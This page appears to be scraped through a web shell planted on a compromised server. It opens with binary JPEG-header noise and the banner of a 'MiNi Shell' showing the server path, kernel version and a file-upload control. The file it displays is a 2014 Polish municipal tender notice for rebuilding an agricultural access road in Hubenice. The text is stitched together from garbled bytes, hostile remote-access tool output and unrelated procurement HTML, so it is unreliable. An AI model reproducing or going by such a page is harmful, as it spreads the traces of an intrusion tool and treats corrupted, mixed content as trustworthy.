JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20140527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20140527/113055-N-2014.html

<p class="kh_header"><b>Gręboszów: Przebudowa drogi dojazdowej do gruntów rolnych w miejscowości Hubenice</b><br>
<b>Numer ogłoszenia: 113055 - 2014; data zamieszczenia: 27.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Gręboszów , Gręboszów 144, 33-260 Gręboszów, woj. małopolskie, tel. 014 6416002, faks (014) 641 60 53.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi dojazdowej do gruntów rolnych w miejscowości Hubenice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót budowlanych obejmuje modernizację  drogi dojazdowej do gruntów rolnych  zlokalizowanej na działkach nr 289/1, 289/2,  567 w miejscowości Hubenice. 
Krótka charakterystyka zamówienia:
       Długość odcinka drogi na której są planowane roboty - 0,560 km, szerokość jezdni  od 3 do  5 m
       1)  Roboty pomiarowe i geodezyjne; wytyczenie trasy drogi w terenie z  odtworzeniem  granic drogi,
2)  Roboty ziemne; profilowanie i zagęszczanie mechaniczne istniejącego podłoża  pod warstwy konstrukcyjne - 2736 m2,
3)  Podbudowy i nawierzchnie z kruszyw; podbudowa grub. 15 cm z kruszywa naturalnego frakcji 0/63
      stabilizowanego mechanicznie - 2652,00 m2, nawierzchnia z kruszywa łamanego dolomitowego o grubości 20 cm
      stabilizowanego mechanicznie frakcji 0/63 wraz z miałowaniem w ilości 28,6 kg/m2 - 2232,00 m2
4)  Pobocza  ziemne z dowiezionego materiału wraz z formowaniem i jego zagęszczeniem   - 99 m3.
          
Szczegółowy opis przedmiotu zamówienia znajduje się w Dokumentacji projektowej, Specyfikacjach  technicznych 
   wykonania i odbioru robót, która jest dostępna w wersji elektronicznej na stronie internetowej  Zamawiającego, które
   stanowią  załącznik nr 10  i 11 do niniejszej SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje możliwość udzielenia zamówień uzupełniających do wysokości 50 % wartości
      zamówienia podstawowego (art.67 ust.1 pkt 6 ustawy Pzp.).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> .    Zamawiający żąda od Wykonawców  wniesienie wadium  przetargowego w kwocie   2 000,00 zł, 
           słownie:   dwa tysiące  złotych, które winno być wniesione  przed upływem terminu składania 
           ofert. 
    2.    Wadium może być wniesione w jednej  lub w kilku  następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym 
że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z 9 listopada 2000 r. 
o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. nr 109, poz. 1158 ze zm.).
    3    Wadium wnoszone w pieniądzu należy wpłacić  przelewem na rachunek  bankowy Zamawiającego: 
          Konto  Nr  33 94621013 2004 4000 1498 0006  Bank Spółdzielczy w Dąbrowie Tarnowskiej, Oddział 
          Gręboszów z dopiskiem - Wadium do przetargu - Przebudowa drogi dojazdowej do gruntów rolnych
          w Hubenicach. 
    4.    W przypadku wnoszenia wadium w formie pieniężnej do oferty należy załączyć kopię przelewu wadium 
           na  rachunek bankowy Zamawiającego potwierdzoną za zgodność z oryginałem przez Wykonawcę. 
    5.   W przypadku wnoszenia przez Wykonawcę wadium w formie określonej w ust.2 pkt 2-5 zobowiązany  jest on 
          dostarczyć Zamawiającemu oryginał właściwego dokumentu poręczenia lub gwarancji przed  upływem  terminu 
           składania ofert i złożyć go w siedzibie Zamawiającego w pokoju nr 11 - sekretariat,  a do  oferty  dołączyć kopię 
           przedmiotowego dokumentu potwierdzoną za zgodność z oryginałem przez  Wykonawcę.  Wymagana ważność 
           wadium w formach innych niż pieniężna  minimum - 30 dni od daty składania ofert. Składane przez Wykonawcę 
           wadium w formie niepieniężnej  musi się powoływać w swej   treści na przepis   art. 46 ust. 5 ustawy Pzp i być 
           bezwarunkowe, nieodwołalne i płatne na pierwsze pisemne  żądanie Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań  w zakresie spełniania tego warunku. Wykonawca potwierdza 
         spełnianie warunku poprzez złożenie oświadczenia  (patrz ;  wzór oświadczenia -  załącznik nr  2 do SIWZ). 
         Ocena  spełnienia tego warunku zostanie dokonana na podstawie oświadczenia złożonego  przez Wykonawcę,  
         na  zasadzie  spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że zrealizował (zakończył) co najmniej dwie roboty budowlane polegające na:   
          remoncie,  przebudowie,  odbudowie drogi klasy technicznej min. D o wartości robót co najmniej 100 tys. zł każda,,  
          i  które zostały wykonane w okresie  ostatnich 5 lat przed  upływem terminu składania ofert, a jeżeli okres 
         prowadzenia działalności jest krótszy  -  w tym okresie,  z podaniem ich rodzaju  i wartości, daty i miejsca wykonania 
          oraz załączeniem dowodów   dotyczących , czy roboty te zostały wykonane w sposób należyty oraz wskazujących, 
          czy zostały wykonane  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.  Dowodami są 
          poświadczenia lub inne  dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie 
          jest w stanie uzyskać  poświadczenia  (patrz; wzór wykazu robót  - załącznik nr  4  do SIWZ).
                       Wartości robót podane w dokumentach w walutach innych niż wskazane przez Zamawiającego powinny przez     
   wykonawcę przeliczone według średniego kursu NBP na dzień przed złożeniem  ofert. Wykonawcy wspólnie     
                     ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają w/w  wymagania.
         Ocena spełnienia tego warunku zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę, 
         na  zasadzie  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań  w zakresie spełniania tego warunku. Wykonawca potwierdza 
          spełnianie warunku poprzez złożenie oświadczenia  (patrz;  wzór oświadczenia - załącznik nr  2 do SIWZ). 
          Ocena spełnienia tego warunku zostanie dokonana na podstawie oświadczenia złożonego  przez Wykonawcę,  
          na  zasadzie  spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje  lub dysponować będzie do realizacji zamówienia osobą, która będzie 
          pełnić funkcję kierownika budowy,   posiadającą  uprawnienia budowlane    do kierowania robotami 
           budowlanymi w specjalności drogowej upoważniającej do kierowania robotami drogowymi.
          Osoby pełniące samodzielne funkcje w budownictwie winny posiadać uprawnienia budowlane i przynależeć 
          do właściwej izby samorządu zawodowego oraz posiadać aktualne ubezpieczenie od odpowiedzialności cywilnej.
          Zamawiający,    określając wymogi dla  osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza 
          odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących 
          przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru  Gospodarczego
          oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12 a oraz innych przepisów ustawy  Prawo budowlane (tekst  
          jednolity. Dz.U. z 2006 r. nr 156, poz. 1118 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych  
          nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r.  nr 63, poz. 394). 
          Wykonawca potwierdza  spełnianie warunku poprzez złożenie wykazu osób, które będą uczestniczyć w wykonaniu 
          zamówienia. (patrz; wzór  - załącznik nr  5 do SIWZ) i złożenie oświadczenia, że osoby, które będą uczestniczyć 
          w wykonywaniu zamówienia posiadają wymagane uprawnienia (patrz; wzór - załącznik nr 6 do SIWZ).
          Ocena  spełnienia tego warunku zostanie dokonana na podstawie  dokumentów złożonych przez  Wykonawcę,  
           na  zasadzie  spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia  w tym zakresie szczególnych wymagań,  w zakresie spełniania tego warunku. 
         Wykonawca potwierdza  spełnianie warunku poprzez złożenie oświadczenia  (patrz; wzór oświadczenia - załącznik  
         nr  2 do SIWZ). Ocena  spełnienia tego warunku zostanie dokonana na podstawie oświadczenia złożonego  przez 
         Wykonawcę,  na  zasadzie  spełnia /nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca musi wykazać, że zrealizował (zakończył) co najmniej dwie roboty budowlane polegające na:   
          remoncie,  przebudowie,  odbudowie drogi klasy technicznej min. D o wartości robót co najmniej 100 tys. zł każda,,  
          i  które zostały wykonane w okresie  ostatnich 5 lat przed  upływem terminu składania ofert, a jeżeli okres 
         prowadzenia działalności jest krótszy  -  w tym okresie,  z podaniem ich rodzaju  i wartości, daty i miejsca wykonania 
          oraz załączeniem dowodów   dotyczących , czy roboty te zostały wykonane w sposób należyty oraz wskazujących, 
          czy zostały wykonane  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.  Dowodami są 
          poświadczenia lub inne  dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie 
          jest w stanie uzyskać  poświadczenia  (patrz; wzór wykazu robót  - załącznik nr  4  do SIWZ).;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  Formularz ofertowy (wzór -  załącznik nr 1 do SIWZ).
       2)  Kosztorys ofertowy (opis  sporządzenia w rozdziale  XVII)
       3)  Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo 
            do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w przypadku 
            gdy umocowanie takie nie wynika ze złożonego odpisu z właściwego rejestru albo zaświadczenia o wpisie 
            do ewidencji działalności gospodarczej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.   Zmiana   postanowień   zawartej   umowy   może nastąpić  za zgodą obu  stron wyrażoną na   piśmie.   
2.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionej poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)	Zmiana terminu realizacji przedmiotu umowy;
a)  Zaistnienia po zawarciu umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego 
     warunku, rozumieć należy zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej:
     -  o charakterze  niezależnym od Stron,
     -  którego Strony nie mogły przewidzieć przed zawarciem umowy, 
     -  którego nie można uniknąć ani któremu Strony nie mogły zapobiec przy zachowaniu należytej 
        staranności,
     -  której nie można przypisać drugiej Stronie.
      Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne
      klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania 
      warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie 
      lub skażenia;
             b) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego,  w szczególności; 
                 wstrzymanie robót przez Zamawiającego;
             c) inne przyczyny zewnętrzne niezależne od  Zamawiającego oraz Wykonawcy skutkujące   niemożliwością 
                 prowadzenia prac, np.: będące następstwem działania organów administracji;  
            d) wystąpienia istotnych wad dokumentacji projektowej, skutkującej koniecznością dokonania poprawek lub 
                 uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizacje określonego rodzaju robót mających 
                 wpływ na zmianę terminu realizacji;    
             W przypadku wystąpienia którejkolwiek z okoliczności wyżej wymienionych, termin wykonania
             umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania 
             jej przedmiotu, nie dłużej jednak niż o okres trwania tych okoliczności.
2)    Zmiana sposobu spełniania świadczenia;
 a) zmiany stanu prawnego w zakresie dotyczącym realizowanej umowy, który spowoduje konieczność zmiany 
     sposobu wykonania  zamówienia przez Wykonawcę.
 b) konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań 
   technicznych lub materiałowych  niż  wskazane w dokumentacji projektowej w sytuacji, gdyby 
   zastosowanie  przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem 
   przedmiotu  umowy lub ze względu na zmiany obowiązującego prawa.
   Zmiana ta będzie wprowadzona wyłącznie w zakresie umożliwiającym oddanie przedmiotu 
   umowy do użytkowania, a Zamawiający nie może ponieść ryzyka zwiększenia wynagrodzenia 
   z tytułu takich zmian.
c) roboty zamienne będą wykonywane przy zachowaniu nie pogorszonych norm, standardów
    i parametrów.  
            d) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku 
                wynagrodzenie  przysługujące Wykonawcy zostanie pomniejszone, przy czym  Zamawiający zapłaci 
                za  wykonane  roboty, które Wykonawca wykonał w oparciu o bazę cen z przetargu, po ich 
                uprzednim zinwentaryzowaniu.
       3)  Zmiany osobowe;
 a) Zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy, na inne 
     legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa 
     w ustawie Prawo budowlane lub innych ustawach, 
b)  Zmiana inspektora nadzoru lub przedstawicieli ze strony Zamawiającego do realizacji umowy.
      4)   Zmiana stawki podatku od towarów i usług VAT. W takim przypadku umowa ulegnie 
             zmianie  w zakresie wysokości ceny brutto.
      5)   Zmiana umożliwiająca usunięcie rozbieżności  lub niejasności w rozumieniu pojęć użytych 
            w umowie w celu jej doprecyzowania i   jednoznacznej interpretacji  jej zapisów przez strony.        
      6)    Zaistnienia innych niemożliwych do przewidzenia w momencie zawarcia umowy okoliczności
             prawnej, ekonomicznej lub technicznej,   za którą żadna ze Stron nie ponosi odpowiedzialności, 
             skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze SIWZ - Zamawiający 
             dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia umowy.
3.	Prawa i obowiązki wynikające z niniejszej umowy nie mogą być przeniesione na rzecz osób trzecich</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.malopolska.pl/uggreboszow/Article/id.135590.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gręboszów, pokój nr 2 lub za zaliczeniem pocztowym, po uprzednim złożeniu wniosku, nie później niż 6 dni przed terminem składania ofert. Cena 100 zł + VAT 23 %.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2014 godzina 10:00, miejsce: Urząd Gminy Gręboszów, Gręboszów 144, 33-260 Gręboszów, pokój nr 11 (piętro) w sekretariacie Urzędu..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane  ze środków budżetu województwa przez Urząd Marszałkowski Województwa Małopolskiego..</p>
